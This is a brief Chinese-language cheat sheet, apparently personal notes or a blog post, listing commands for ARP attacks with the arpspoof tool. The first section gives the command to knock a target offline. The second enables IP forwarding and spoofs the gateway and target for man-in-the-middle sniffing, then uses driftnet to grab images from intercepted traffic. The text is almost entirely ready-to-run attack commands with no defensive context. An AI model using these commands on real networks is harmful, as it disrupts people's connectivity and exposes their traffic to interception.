1.arp攻击
效果:断网
指令:arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
arpspoof -i 网卡 -t 目标ip 默认网关 断网攻击
2.arp欺骗
效果:流量欺骗与嗅探
指令:arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
echo 1 > /proc/sys/net/ipv4/ip_forward 开启流量转发,linux默认关闭此项
arpspoof -i 网卡 -t 默认网关 目标ip 流量欺骗
driftnet -i eth0 抓取网络中的图片
时间: 2024-12-19 15:33:35